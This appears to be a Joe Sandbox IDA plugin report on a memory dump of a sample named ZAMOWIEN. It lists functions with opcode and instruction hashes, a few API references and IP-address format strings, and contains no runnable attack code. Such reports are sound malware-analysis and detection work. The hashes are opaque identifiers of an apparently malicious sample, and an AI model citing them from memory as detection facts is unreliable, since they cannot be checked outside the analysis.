Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb2c5d93ad5d7ea135688231c82db38d5c452ad9b1750b3e5994120cbcd6b73e
Instruction ID: 3d4cc19bff6f96462b68ab416e11df538c30c72b54423b962e5d361873a18458
Opcode Fuzzy Hash: eb2c5d93ad5d7ea135688231c82db38d5c452ad9b1750b3e5994120cbcd6b73e
Instruction Fuzzy Hash: 4790023520140C07D104B1589D04686000547D0301F55C413A6024615E9AE589A97132

Function 32832BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b8e453d4ece6d3fdb3bc8cdf94b71453e7ef36e838f8c863dc12cfa37bac78
Instruction ID: 29336bd196d6a2d2caac9f6018a9626ee5d2bde9be51f873de8e6b05a082915f
Opcode Fuzzy Hash: 77b8e453d4ece6d3fdb3bc8cdf94b71453e7ef36e838f8c863dc12cfa37bac78
Instruction Fuzzy Hash: AE90023560540C07D150B1589914746000547D0301F55C413A0024614D8BD58B6D76A2

Function 32832BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 335199052d994f837ef5354a660e8654b0c885e8c89fe6cbf8be77b1aa35d777
Instruction ID: f34c183e4f22428477e4fdab6dda9f076b2b30f5fd557acafc5d396b90bee292
Opcode Fuzzy Hash: 335199052d994f837ef5354a660e8654b0c885e8c89fe6cbf8be77b1aa35d777
Instruction Fuzzy Hash: 0590023520544C47D140B1589904A46001547D0305F55C413A0064654D9AA58E6DB662

Function 32832BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4903cd86836a1a5b492856814aa11345c49c478e772c31e02ca3966461957514
Instruction ID: 444e62e33c3c9b785ded17cfdececbce8b51e36022239b90205af3afb6e8ad2a
Opcode Fuzzy Hash: 4903cd86836a1a5b492856814aa11345c49c478e772c31e02ca3966461957514
Instruction Fuzzy Hash: 8690023520140C07D180B158990464A000547D1301F95C417A0025614DCE958B6D77A2

Function 32832E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1038070e726316b3a922d97a883fc9af22bacc082f6839c61821c26e95b5e770
Instruction ID: b1588e11b2b05cf4e6e2f8b615aea67197700857359f9764dc8557a77b08457b
Opcode Fuzzy Hash: 1038070e726316b3a922d97a883fc9af22bacc082f6839c61821c26e95b5e770
Instruction Fuzzy Hash: 2B90022560140907D101B1589904616000A47D0341F95C423A1024515ECEA58AAAA132

Function 32832EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d12c1a05cb50345859f2b9f64b58099451b1d82328bfc4f9b56d4fda6588c218
Instruction ID: 59787613836f6a470a31d17d533fae7d42e76c533930ca63e95c35997efb93aa
Opcode Fuzzy Hash: d12c1a05cb50345859f2b9f64b58099451b1d82328bfc4f9b56d4fda6588c218
Instruction Fuzzy Hash: 3F90027520140807D140B1589904746000547D0301F55C413A5064514E8AD98EED6666

Function 32832EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53eb7007f21c33e77fbffc93d858ba770dfabfd3236057eed0b8b51d9188ee89
Instruction ID: dfa8b499e76850f3254bc9f68c11a3d953841946afa1c1b81f215719fd496178
Opcode Fuzzy Hash: 53eb7007f21c33e77fbffc93d858ba770dfabfd3236057eed0b8b51d9188ee89
Instruction Fuzzy Hash: AC90026520180807D140B5589D04607000547D0302F55C413A2064515E8EA98D696136

Function 32832E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b50c5aa16d5cbc67d00b8ebbfd03336a7377a5bdb93a4e680546b4250496fdd9
Instruction ID: 339121be68b2891c0b5abf41c2777923ea8adf113eb826214c93cedc38f46faf
Opcode Fuzzy Hash: b50c5aa16d5cbc67d00b8ebbfd03336a7377a5bdb93a4e680546b4250496fdd9
Instruction Fuzzy Hash: 9490022530140807D102B1589914606000987D1345F95C413E1424515D8AA58A6BA133

Function 32832F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58a4d616188479b1aa281323d4b7a5841cb48d886b377e669bce5d7c46a669cc
Instruction ID: 1661269e6258b164afb0732cd1b6c377f6a4b5f82d483db468e1d0883413671e
Opcode Fuzzy Hash: 58a4d616188479b1aa281323d4b7a5841cb48d886b377e669bce5d7c46a669cc
Instruction Fuzzy Hash: 3090023520180807D100B1589D1470B000547D0302F55C413A1164515D8AA589696572

Function 32832FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95b0c99d57ae4e77093882a067c74b9809cdf8a0b31e2c2d9355ac67ad9dfcdd
Instruction ID: a9c3a471eea7012494820e0188864d27e773cf95148cb69072bedcf43a838f13
Opcode Fuzzy Hash: 95b0c99d57ae4e77093882a067c74b9809cdf8a0b31e2c2d9355ac67ad9dfcdd
Instruction Fuzzy Hash: 6290023520180807D100B1589D08747000547D0302F55C413A5164515E8AE5C9A96532

Function 32832FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ee5eca9ea50608ce2808caa5f667e373d039c62166898ac8f01b2763359a64e
Instruction ID: e6b0309ccfe558f0898b7b4f0de1c980a427a8d14ec13c35d41ecfb93861eadb
Opcode Fuzzy Hash: 5ee5eca9ea50608ce2808caa5f667e373d039c62166898ac8f01b2763359a64e
Instruction Fuzzy Hash: 1D900225601404474140B168DD4490640056BE1311755C523A0998510D89D9897D5666

Function 32832FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27cb91c1f213d800ba7977adeb435d337735cbe757e8c72af41cb073164cd9b9
Instruction ID: 059d7b7470fe90a1e0ff316efbf5fccccb06a5d7a5714e6e4d39ecf588350620
Opcode Fuzzy Hash: 27cb91c1f213d800ba7977adeb435d337735cbe757e8c72af41cb073164cd9b9
Instruction Fuzzy Hash: F4900225211C0447D200B5689D14B07000547D0303F55C517A0154514CCD9589795522

Function 32832F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7d91df24e70b759323db58879f88d165dfbe232ffd0e42b83c6f098ab81408f
Instruction ID: 20c2260f30f737d5ba220b2a3a02e2b12030699f8150d81cf32c5e2d5e4b526a
Opcode Fuzzy Hash: d7d91df24e70b759323db58879f88d165dfbe232ffd0e42b83c6f098ab81408f
Instruction Fuzzy Hash: 5E90026534140847D100B1589914B06000587E1301F55C417E1064514D8A99CD6A6127

Function 32832F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 075c4a1c3d5e547201c6655e7ca414fe18ba87d68dff7c48480597ab25e26237
Instruction ID: 90852a5da9e1f86b98e1b2277c10c4e259b3604c82cd0597b27189b96e3e2405
Opcode Fuzzy Hash: 075c4a1c3d5e547201c6655e7ca414fe18ba87d68dff7c48480597ab25e26237
Instruction Fuzzy Hash: F790026521140447D104B1589904706004547E1301F55C413A2154514CC9A98D795126

Function 32832CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dd06c8db2db102fdbdb4cd2a97a424ed57078014f9b6b98f118c04817490fdc
Instruction ID: 9c3c76b9f68c9b8901c4696ce3c6c2cbae97747cc336c498298982c824a82921
Opcode Fuzzy Hash: 6dd06c8db2db102fdbdb4cd2a97a424ed57078014f9b6b98f118c04817490fdc
Instruction Fuzzy Hash: 4490023520140807D100B598A908646000547E0301F55D413A5024515ECAE589A96132

Function 32832CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0fdc7443e9ec63e2f1f4e284b8eb5e0e54887b32e14cfb8c07e96cd3c8fb997
Instruction ID: 629383e0c23994812303f1cbc1d1a432810ffd6e66652dbb4213429337537b5c
Opcode Fuzzy Hash: c0fdc7443e9ec63e2f1f4e284b8eb5e0e54887b32e14cfb8c07e96cd3c8fb997
Instruction Fuzzy Hash: FF90022560540807D140B158A918706001547D0301F55D413A0024514DCAD98B6D66A2

Function 32832CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83601d6b4d0cdc835632f715aecc60304a86a8209da5459fafc48bb881efa8dc
Instruction ID: 792cff589fe871a738667a9b9734756fbe11c6b3c8c82a3768702212a09777b2
Opcode Fuzzy Hash: 83601d6b4d0cdc835632f715aecc60304a86a8209da5459fafc48bb881efa8dc
Instruction Fuzzy Hash: 8290023520140807D100B158AA08707000547D0301F55D813A0424518DDAD689696122

Function 32832C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4e755eca758d699aa38bdbd273883b759c081edfc18248bb5025490829afbb4
Instruction ID: 43cc793baac23afef3a01deb848d3ff08bc53ce8373c4414cb4ddf392f4fb019
Opcode Fuzzy Hash: b4e755eca758d699aa38bdbd273883b759c081edfc18248bb5025490829afbb4
Instruction Fuzzy Hash: 1490023520140C47D100B1589904B46000547E0301F55C417A0124614D8A95C9697522

Function 32832DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e00797187f273d21c57a07a557931c1068c83116699f1282401f254a768d856
Instruction ID: 96a15b575b53622435e700ca837802fd72efaddc37d40e683046390a9ec66e9f
Opcode Fuzzy Hash: 8e00797187f273d21c57a07a557931c1068c83116699f1282401f254a768d856
Instruction Fuzzy Hash: 4190023524140807D141B1589904606000957D0341F95C413A0424514E8AD58B6EAA62

Function 32832DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17a23308fdf30db87c5428c72a15cf75f37aa5e76608306fb7daa9321afccc50
Instruction ID: 4a0079af54c51d19791f14876cb65557349f708b9d1f50e8672ff3c98f34fc3d
Opcode Fuzzy Hash: 17a23308fdf30db87c5428c72a15cf75f37aa5e76608306fb7daa9321afccc50
Instruction Fuzzy Hash: CC900225242445575545F1589904507400657E0341795C413A1414910C89A6996ED622

Function 32832D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b57e9d1700945eb77367b4de50f94780792116ad20e048f65c93d9b3eaec1a
Instruction ID: 925f36857d242c5ad4192b60ffd524f646a8403841b5805f2301917b308e3051
Opcode Fuzzy Hash: 25b57e9d1700945eb77367b4de50f94780792116ad20e048f65c93d9b3eaec1a
Instruction Fuzzy Hash: 6A90022520544847D100B558A908A06000547D0305F55D413A1064555DCAB58969A132

Function 32832D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b024ef957e33b864b04e71ff14e9db638a79bcdcde06cfa90d9b4ac7b962039f
Instruction ID: 232888b471df676d15370d0b7c0cf3f468d9f466c6abef41e4f094c3f76c338c
Opcode Fuzzy Hash: b024ef957e33b864b04e71ff14e9db638a79bcdcde06cfa90d9b4ac7b962039f
Instruction Fuzzy Hash: 6590022D21340407D180B158A90860A000547D1302F95D817A0015518CCD95897D5322

Function 32832D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b9bfe778918112273812706aff05d64e4757c38180968196a512d8da8d431e4
Instruction ID: e360f36dd39e80eea5c8302956777fcdd0551ef37e96b3bde4eb5b464c4eb914
Opcode Fuzzy Hash: 4b9bfe778918112273812706aff05d64e4757c38180968196a512d8da8d431e4
Instruction Fuzzy Hash: 2C90022530140407D140B158A918606400597E1301F55D413E0414514CDD95896E5223

Function 32832C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 4632baa7a6ffc2982c4ebe418d1f422cfab746f5946955fd86abb0c0832bf0cb
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 32832890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___swprintf_l.LIBCMT ref: 3283293C
___swprintf_l.LIBCMT ref: 3283295E
___swprintf_l.LIBCMT ref: 328329A3
___swprintf_l.LIBCMT ref: 3286A52E

Strings

ffff:, xrefs: 3286A504
::ffff:0:%u.%u.%u.%u, xrefs: 3286A54E
::%hs%u.%u.%u.%u, xrefs: 3286A527
:%u.%u.%u.%u, xrefs: 3286A5B8

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: bab2fa798e2f697ad54890f96820d7101f07cf117253881ed69c810ac20c1529
Instruction ID: 454f20751fed4386bd6fd8dbc7bbf7e06334d37b97f7ebe3301219993be75d05
Opcode Fuzzy Hash: bab2fa798e2f697ad54890f96820d7101f07cf117253881ed69c810ac20c1529
Instruction Fuzzy Hash: 7551F9BDA0021AAFDB15DFA8C88097EF7B8BB083457508169E9A8D7645D634DE40CBE0

Function 328A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___swprintf_l.LIBCMT ref: 328A24A6
___swprintf_l.LIBCMT ref: 328A24E2
___swprintf_l.LIBCMT ref: 328A257D
___swprintf_l.LIBCMT ref: 328A25A3
___swprintf_l.LIBCMT ref: 328A25C8
___swprintf_l.LIBCMT ref: 328A2608

Strings

ffff:, xrefs: 328A247D, 328A249D
:%u.%u.%u.%u, xrefs: 328A25FF
::%hs%u.%u.%u.%u, xrefs: 328A249E
::ffff:0:%u.%u.%u.%u, xrefs: 328A24DA

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 5f85d21d48cf2b7c13c0092da3015c0956c28e87a73e2db624856fd658872e56
Instruction ID: fbad413abda5eaefcb943d0fdc69c0489f8956a06546eaf54057446e8e1fb6e0
Opcode Fuzzy Hash: 5f85d21d48cf2b7c13c0092da3015c0956c28e87a73e2db624856fd658872e56
Instruction Fuzzy Hash: 6F51057DA00649AFEB34CF9CC8A097FB7F9EB44340B408459E4A9D7645EE74DA50CB60

Function 328CA670 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 328CA6DD
RtlDebugPrintTimes.NTDLL ref: 328CA771
RtlDebugPrintTimes.NTDLL ref: 328CA794
RtlDebugPrintTimes.NTDLL ref: 328CA7C0
